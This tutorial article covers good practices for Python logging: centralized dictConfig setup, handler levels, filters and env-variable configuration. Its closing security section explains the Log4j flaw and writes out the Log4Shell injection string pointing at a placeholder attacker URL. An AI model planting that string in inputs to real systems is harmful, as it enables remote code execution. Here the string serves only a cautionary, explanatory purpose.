Good practices for using Python logging

Problem Statement

While maintaining a legacy Python project, we noticed several issues with how the code logs events.

Outputs out of order

In some places the legacy code still uses the print() function and traceback.print_exc(), as shown below:

import traceback

try:
    #my logic goes here
    print("my output")
except Exception:
    traceback.print_exc()

By default those streams are buffered: print() sends output to stdout, while traceback.print_exc() sends output to stderr. If the buffers are not flushed in time (or buffering is not disabled), the two streams can interleave and the combined output appears out of order.
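
A minimal sketch of the problem (the exact interleaving depends on how the streams are buffered, for example when stdout is redirected to a file):

import sys
import traceback

print("step 1")            # buffered on sys.stdout
try:
    1 / 0
except Exception:
    traceback.print_exc()  # written to sys.stderr
# With stdout block-buffered (e.g. piped to a file), "step 1" may only be
# flushed at exit and so appear after the traceback; flushing avoids this.
print("step 2", flush=True)

Routing everything through the logging module avoids the problem, since a StreamHandler flushes after each record it emits.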

Logging configuration not centralized and externalized

We also noticed that the logging configuration is repeated in every file that uses Python logging. In other words, the configuration is neither centralized nor externalized for easy use.

Also, when a message is logged, the 'logging' module is used directly instead of a 'logger' object. The module-level functions delegate to the root logger by default, which makes the logging in the code much less configurable.

import logging

#Anti-pattern: basicConfig() is repeated in every file, and the module-level
#logging.info() always records through the root logger
logging.basicConfig(
  format="[%(asctime)s.%(msecs)03d %(levelname)s] %(message)s",
  level=logging.INFO)

logging.info("Starting of my code.")

Good practices

Before reading further, you may want to go through the Python logging tutorial to understand how Python logging works, especially the concepts of logger, formatter, filter, and handler. You may also want to understand the logging flow, which is described in the Advanced Logging Tutorial.

To make logging in applications easy to use and configure, we apply the good practices below. We call them good practices rather than best practices, because different types of applications may need specific logging solutions to best meet their requirements.

  • Logging events propagate to ancestor loggers by default, so a good practice is to attach handlers only to the root logger and let propagation take care of the rest (see the sketch after this list).
  • Always set every handler's level to DEBUG, and let users configure levels on loggers; setting the level on the root logger alone is enough when no child logger sets one explicitly.
  • Run the logging configuration only once, at application startup.
  • Log messages through a logger object instead of the logging module.
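
A minimal sketch of the first two practices (the logger name "myapp.module" is only an illustrative placeholder): the child logger has neither handlers nor an explicit level, yet its records reach the root handler through propagation, and the effective level is inherited from the root logger.

import logging

# Handler attached to the root logger only, with its level pinned to DEBUG
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
root = logging.getLogger()
root.addHandler(handler)
root.setLevel(logging.INFO)  # users configure levels on loggers, not handlers

# Child logger: no handler and no explicit level of its own
logger = logging.getLogger("myapp.module")
logger.info("reaches the root handler via propagation")        # emitted
logger.debug("dropped by the INFO level inherited from root")  # not emitted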

Sample Code

import os
from os.path import join
import logging
from logging.config import dictConfig

#Get user's configuration from env variables
LOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO').upper()
LOG_FILTER = os.getenv('LOG_FILTER', '')
if os.getenv("LOG_HANDLERS"):
    #Split the comma-separated list, dropping stray whitespace
    LOG_HANDLERS = [h.strip() for h in os.getenv("LOG_HANDLERS").split(",")]
else:
    LOG_HANDLERS = ["console", "file"]

#Decide where to store log files
log_dir = os.path.expanduser('~/logs')
os.makedirs(log_dir, exist_ok=True)
log_file = join(log_dir, 'application.log')

logging_config = {
    # Always 1. Schema versioning may be added in a future release of logging
    "version": 1,
    # "Name of formatter" : {Formatter Config Dict}
    "formatters": {
        # Formatter Name
        "standard": {
            # Optional: defaults to logging.Formatter
            "class": "logging.Formatter",
            # Optional: logging output format
            "format": "%(asctime)s\t[%(levelname)s]\t%(name)s|%(lineno)s:\t%(message)s",
            #"format": "[%(asctime)s %(levelname)s]%(filename)s\t%(message)s",
            # Optional: asctime format
            #"datefmt": "%d %b %y %H:%M:%S"
        }
    },
    'filters': {
        'customfilter': {
            '()': logging.Filter,
            'name': LOG_FILTER
        }
    },
    # Handlers use the formatter names and filter names declared above
    "handlers": {
        # Name of handler
        "console": {
            # The handler class. A mixture of dictConfig() keys and
            # handler-specific keyword arguments (kwargs) is passed in here.
            "class": "logging.StreamHandler",
            # This is the formatter name declared above
            "formatter": "standard",
            "level": "DEBUG",
            "filters": ["customfilter"],
            # The default is stderr
            "stream": "ext://sys.stdout"
        },
        # Same formatter and filter as the StreamHandler above, but with
        # handler-specific kwargs for file rotation.
        "file": {
            "class": "logging.handlers.RotatingFileHandler",
            "formatter": "standard",
            "level": "DEBUG",
            "filters": ["customfilter"],
            "filename": log_file,
            "mode": "w",
            "encoding": "utf-8",
            "maxBytes": 500000,
            "backupCount": 4
        }
    },
    # Configuration for the root logger
    "root": {
        "level": LOG_LEVEL,
        "handlers": LOG_HANDLERS
    }
}

dictConfig(logging_config)

logger = logging.getLogger(__name__)
logger.info('Current logging LEVEL is %s', LOG_LEVEL)
logger.info('Current logging filter is %s', LOG_FILTER)
logger.info('Current logging handlers are %s', LOG_HANDLERS)
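
The customfilter above is the stock logging.Filter class. With a non-empty name, only records from that logger and its children pass; with the default empty name, everything passes. A minimal sketch, using 'myapp' as an illustrative filter value:

import logging

# logging.Filter("myapp") allows records from "myapp" and "myapp.*" only
f = logging.Filter("myapp")
kept = logging.LogRecord("myapp.db", logging.INFO, __file__, 1, "kept", None, None)
dropped = logging.LogRecord("other", logging.INFO, __file__, 1, "dropped", None, None)
print(f.filter(kept))     # True  - the record's logger is inside the subtree
print(f.filter(dropped))  # False - the record's logger is outside the subtree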

The configuration module above is imported once during application startup. After that, every Python file can add the snippet below to start logging.

import logging

logger = logging.getLogger(__name__)

def myfunction():
    logger.debug("My function starts from here.")
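
Because the configuration reads LOG_LEVEL, LOG_FILTER, and LOG_HANDLERS from the environment, a run's logging behavior can be changed without touching code. A sketch under the assumption that the configuration above lives in a module named log_config (a hypothetical name):

import os

# Hypothetical: raise verbosity and log to the console only for this run;
# the variables must be set before the configuration module is imported
os.environ["LOG_LEVEL"] = "DEBUG"
os.environ["LOG_HANDLERS"] = "console"

import log_config  # hypothetical module holding the dictConfig() call above

In practice the variables would usually be exported by the shell or the service manager before the process starts.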

Logging is simple but important and sometimes risky

On December 10th, 2021, NIST published a critical CVE, CVE-2021-44228, for the Log4j vulnerability. Though it belongs to the Java world, it is a strong reminder to use logging securely. The vulnerability is estimated to be one of the largest security exposures in history, considering how widely Java is used and how widely Log4j is used within Java programs.

The vulnerability allows unauthenticated remote code execution. Attackers can exploit it simply by getting a string like ${jndi:ldap://[attacker_URL]} logged, after which Log4j may download and execute the attacker’s code.

The 'security consideration' below, on using Python logging, is quoted from the Python manual.

"The logging configuration functionality tries to offer convenience, and in part this is done by offering the ability to convert text in configuration files into Python objects used in logging configuration - for example, as described in User-defined objects. However, these same mechanisms (importing callables from user-defined modules and calling them with parameters from the configuration) could be used to invoke any code you like, and for this reason you should treat configuration files from untrusted sources with extreme caution and satisfy yourself that nothing bad can happen if you load them, before actually loading them."

References

  • Logging HOWTO (basic and advanced tutorials): https://docs.python.org/3/howto/logging.html
  • Security considerations in logging.config: https://docs.python.org/3/library/logging.config.html
  • NIST NVD entry for CVE-2021-44228: https://nvd.nist.gov/vuln/detail/CVE-2021-44228